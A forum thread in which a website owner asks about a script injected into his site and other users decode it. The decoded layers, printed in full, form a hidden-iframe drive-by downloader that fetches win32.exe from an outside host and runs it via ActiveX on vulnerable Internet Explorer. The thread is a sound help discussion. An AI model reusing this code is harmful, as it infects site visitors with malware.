Was I hacked?

hey all,

found this on my site >
came from "codecsoft.net" - i think.

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%63%6f%64%65%63%73%6f%66%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

what is that?

i removed it, and changed my password.

but WHAT IS IT?

THANKS
mike

 

well if u dident add this code and you found it ... u got hacked

 

Unescapes to:

document.write('<iframe src=http://codecsoft.net/strong/167/ width=1 height=1></iframe>');

Code (markup):

And that page unescapes to:

// Š ¬¥­â ਩ ­ å :) -->
<style> * {CURSOR: url("123.htm")} </style>
<iframe src="exp1.htm" width="1" height="1"></iframe>
// Š ¬¥­â ਩ ­ å :) -->
<iframe src="exp2.htm" width="1" height="1"></iframe>
// Š ¬¥­â ਩ ­ å :) -->
<iframe src="exp3.htm" width="1" height="1"></iframe>
// Š ¬¥­â ਩ ­ å :) -->
<iframe src="exp4.htm" width="1" height="1"></iframe>

Code (markup):

And the first page goes to:

<script language="JavaScript"> 

// Š ¬¥­â ਩ ­ å :) -->
var xname='ob'+'j';
var obj_RDS = document.createElement(xname+'ect');
var ids='i'+'d';
var xrds='R'+'DS';
obj_RDS.setAttribute(ids,'obj_'+xrds);

var cls_id1='cl'+'si'+'d:BD'+'96C5';
var cls_id2='56'+'-65'+'A3-11'+'D0-983A'+'-00C04'+'FC29E36';
obj_RDS.setAttribute('classid',cls_id1+cls_id2);

var is__obj_adodb = 0;
// Š ¬¥­â ਩ ­ å :) -->
var xname_str="ad"+"odb.s"+"tream";
try { var obj_adodb = obj_RDS.CreateObject(xname_str,""); 
is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1) 
{ try { var obj_adodb = new ActiveXObject(xname_str); is__obj_adodb = 1; } catch(e){} } 
if (is__obj_adodb == 1) { try { 
var appl_="Sh"+"el"+"l.App"+"lica"+"tion";
var obj_ShellApp = obj_RDS.CreateObject(appl_,"");
var xml_name="ms"+"xm"+"l2.X"+"MLH"+"TTP";
var obj_msxml2 = new ActiveXObject(xml_name);
// Š ¬¥­â ਩ ­ å :) -->
obj_msxml2.open("G"+"ET","http://codecsoft.net/adv/167/win32.exe",false); 

// Š ¬¥­â ਩ ­ å :) -->

obj_msxml2.send(); 
obj_adodb.type = 1; 
obj_adodb.open(); 
obj_adodb.Write(obj_msxml2.responseBody); 

// Š ¬¥­â ਩ ­ å :) -->

var fn = "C:\\xx1232255"+".e"+"xe"; obj_adodb.SaveToFile(fn,2); 
obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>

Code (markup):

It looks very very very dodgy

 

thank gawd for you SMART people around here.

1) i removed it from my site - so should i be okay now?
2) should i inform my host?
3) probably impossible to track these people?
4) appears as though NO SERIOUS DAMAGE - could they have just been "playing around" to show their skills?

THANKS AGAIN!
mike

 

yes better to contact them and let them know , they might track them down and see if they did other things .

 

It looks very much like an Internet Explorer hack, I would recommend updating your anti-virus, clearing all temp files and check your root C: for .exe files for weird filenames like xx1232255.exe

It could be a MSXML hack which I think was patched sometime ago.

Having just checked google its the Win32.malware.gen and there are some removal instructions at http://fileinfo.prevx.com/spyware/qq8b2181306289-XX1236408378/XX1232255.EXE.html but just google the filename and you'll find loads.

 

thanks again!

QUESTION/CLARIFICATION:

it's not my server. i just have shared space there. i.e. i purchased shared hosting there. so, re: your message above, you mean that: MY HOST should follow the removal instructions - right.

in other words, it DID NOT affect my personal computer - correct?

my computer anti-virus indicates NO SIGN of malware or otherwise.

PLEASE CLARIFY.

cheers
mike

 

Honestly I don't know, is your hosting Windows based on *nix based?

 

It had the potential to affect any computer who viewed your website, and ran that script.

Meaning you should check too.

Also, see if there is any way the person could of injected that into your website and remove it or secure it.

 

It is probably a "Zombies-R-Us" hack.

Your site was set up as a point to distribute, and create zombies.

The code, which was oh-so-bravely downloaded by John@PP does the following:

1. tries to write to the registry entry to check if ActiveX is available in {BD96C556-65A3-11D0-983A-00C04FC29E36}
2. opens a stream to codecsoft.net
3. downloads a file win32.exe
4. saves it to a file C:\xx1232255.exe
5. and executes it in the background,
6. while masking any errors.

Your site was used to distribute this script (and the others), to anyone who visited your site and is vulnerable.

 

thanks DC + libertate, et al.

i will look for that file and go from there.

i removed the script from my site/HTML, and double-checked. it's gone.

THANKS!
mike

 

"Where angels fear to tread" Plus Firefox doesn't suffer from the MSXML hack I believe.

 

I think the same, I'm pretty sure it only affects explorer.

 

i just checked my personal computer (i use FIREFOX), and i visited my site several times and saw that script, (took me 2 weeks to clue in!!!)

and NO SIGN of any file on my computer that contains 1232255 in any way.

THANKS AGAIN.
mike

 

lol u got hacked boy.....hackers always change index.php or html..so u better work on them..

 

nuthin you can do ecept delete da script, but may i suggest redesigning those pages from scratch. just so that all tha crud left in bits and pieces left slow it down. its not neccesary but worth it in the long run.